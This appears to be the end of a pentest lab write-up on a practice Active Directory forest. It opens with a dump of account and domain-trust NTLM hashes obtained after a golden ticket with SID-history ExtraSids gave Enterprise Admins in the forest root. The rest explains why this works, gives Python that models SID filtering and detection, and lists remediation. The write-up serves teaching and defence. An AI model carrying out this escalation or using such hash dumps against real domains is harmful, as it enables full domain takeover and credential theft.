tywin.lannister:1113:aad3b435b51404eeaad3b435b51404ee:af52e9ec3471788111a6308abff2e9b7:::
jaime.lannister:1114:aad3b435b51404eeaad3b435b51404ee:12e3795b7dedb3bb741f2e2869616080:::
cersei.lannister:1115:aad3b435b51404eeaad3b435b51404ee:c247f62516b53893c7addcf8c349954b:::
tyron.lannister:1116:aad3b435b51404eeaad3b435b51404ee:b3b3717f7d51b37fb325f7e7d048e998:::
robert.baratheon:1117:aad3b435b51404eeaad3b435b51404ee:9029cf007326107eb1c519c84ea60dbe:::
joffrey.baratheon:1118:aad3b435b51404eeaad3b435b51404ee:3b60abbc25770511334b3829866b08f1:::
renly.baratheon:1119:aad3b435b51404eeaad3b435b51404ee:1e9ed4fc99088768eed631acfcd49bce:::
stannis.baratheon:1120:aad3b435b51404eeaad3b435b51404ee:d75b9fdf23c0d9a6549cff9ed6e489cd:::
petyer.baelish:1121:aad3b435b51404eeaad3b435b51404ee:6c439acfa121a821552568b086c8d210:::
lord.varys:1122:aad3b435b51404eeaad3b435b51404ee:52ff2a79823d81d6a3f4f8261d7acc59:::
maester.pycelle:1123:aad3b435b51404eeaad3b435b51404ee:9a2a96fa3ba6564e755e8d455c007952:::
KINGSLANDING$:1001:aad3b435b51404eeaad3b435b51404ee:f661727e5c8df73a4d6bc2892ff5bda6:::
NORTH$:1104:aad3b435b51404eeaad3b435b51404ee:35296a99e4d4c1f512b05b4486ff56aa:::
ESSOS$:1105:aad3b435b51404eeaad3b435b51404ee:86ac8394a5c6af4329886bf9e4d58407:::
[*] Cleaning up...
Administrator credentials for the sevenkingdoms.local forest root have been obtained.
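Why did a ticket forged with the child domain's krbtgt key give us Enterprise Admins in the forest root? The PAC of the golden ticket carries an ExtraSids (SID history) entry, and a parent/child trust inside one forest does not apply SID filtering, so the root DC honours <root SID>-519 as a group membership. Forest and external trusts filter such SIDs by default, and the same filtering can be turned on for an intra-forest trust with netdom trust /quarantine:yes, at the cost of breaking legitimate SID history. The following added example (my own code, not part of the post and not Impacket) models that decision using the two domain SIDs from the lookupsid output above. The filtering rule is a simplified model of Windows trust SID filtering, assumed here for illustration; the real implementation strips additional SID classes. The last function is the detection view: a ticket whose ExtraSids claim a privileged RID in a domain other than the one that issued it is exactly the pattern used above, and the account name goldenuser exists in neither domain, which is the classic golden-ticket indicator in the root DC's logon events.

```python
"""Model the SID-history trick above and the SID filtering that defeats it.

Added example; not from the original post and not Impacket code. The two
domain SIDs are the ones lookupsid printed above. The filtering rule is a
simplified model of Windows trust SID filtering (quarantine), assumed here
for illustration.
"""

NORTH_SID = "S-1-5-21-2343606889-1312097775-3500245986"        # north.sevenkingdoms.local (child)
SEVENKINGDOMS_SID = "S-1-5-21-2095540843-66383145-2975355457"  # sevenkingdoms.local (forest root)

# Well-known RIDs; all of them appear in the lookupsid output above.
PRIVILEGED_RIDS = {
    500: "Administrator",
    512: "Domain Admins",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
}


def split_sid(sid):
    """Split 'S-1-5-21-a-b-c-rid' into (domain_sid, rid).

    Anything that is not a domain-relative SID (e.g. S-1-5-11) yields
    (None, None) so callers can skip it.
    """
    parts = sid.split("-")
    if len(parts) != 8 or parts[:4] != ["S", "1", "5", "21"]:
        return None, None
    return "-".join(parts[:7]), int(parts[7])


def filter_extra_sids(extra_sids, trusted_domain_sid, quarantined):
    """Apply the trust's SID filtering to a ticket's ExtraSids (SID history).

    quarantined=False models the default parent/child trust inside a forest,
    which passes ExtraSids through untouched; the golden ticket above relies
    on that. quarantined=True models SID filtering (default on forest and
    external trusts, or netdom trust /quarantine:yes): every SID that is not
    relative to the trusted domain itself is dropped.
    """
    if not quarantined:
        return list(extra_sids)
    kept = []
    for sid in extra_sids:
        domain, _rid = split_sid(sid)
        if domain == trusted_domain_sid:
            kept.append(sid)
    return kept


def honoured_privileged_groups(extra_sids, trusted_domain_sid,
                               target_domain_sid, quarantined):
    """Privileged groups of the target domain the ticket would be granted."""
    groups = []
    for sid in filter_extra_sids(extra_sids, trusted_domain_sid, quarantined):
        domain, rid = split_sid(sid)
        if domain == target_domain_sid and rid in PRIVILEGED_RIDS:
            groups.append(PRIVILEGED_RIDS[rid])
    return groups


def foreign_privileged_sids(extra_sids, ticket_domain_sid):
    """Detection view: ExtraSids claiming a privileged RID in a domain other
    than the one that issued the ticket."""
    hits = []
    for sid in extra_sids:
        domain, rid = split_sid(sid)
        if domain and domain != ticket_domain_sid and rid in PRIVILEGED_RIDS:
            hits.append((sid, PRIVILEGED_RIDS[rid]))
    return hits


if __name__ == "__main__":
    # The ExtraSids value the impacket-ticketer command above put in the PAC.
    golden_extra = [SEVENKINGDOMS_SID + "-519"]
    for quarantined in (False, True):
        groups = honoured_privileged_groups(golden_extra, NORTH_SID,
                                            SEVENKINGDOMS_SID, quarantined)
        print(f"SID filtering {'on ' if quarantined else 'off'}: {groups}")
    print("suspicious:", foreign_privileged_sids(golden_extra, NORTH_SID))
```

With filtering off (the lab's configuration) the ticket is honoured as Enterprise Admins; with filtering on the ExtraSids entry is dropped and the same ticket grants nothing in the root. The durable fixes are the ones the attack path itself suggests: treat every child-domain DC as forest-root-equivalent and rotate the child krbtgt key twice after any compromise, since the ticket above is valid for as long as that key is.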
Conclusion
This completes the process. You have now obtained administrator privileges and credentials for each machine.
I hope this article has helped you understand pentesting better.
We are currently looking for people who would like to work with us at NFLabs to conduct research and give back to the field, so we look forward to your application.
Well, I hope to have another opportunity to write something for you.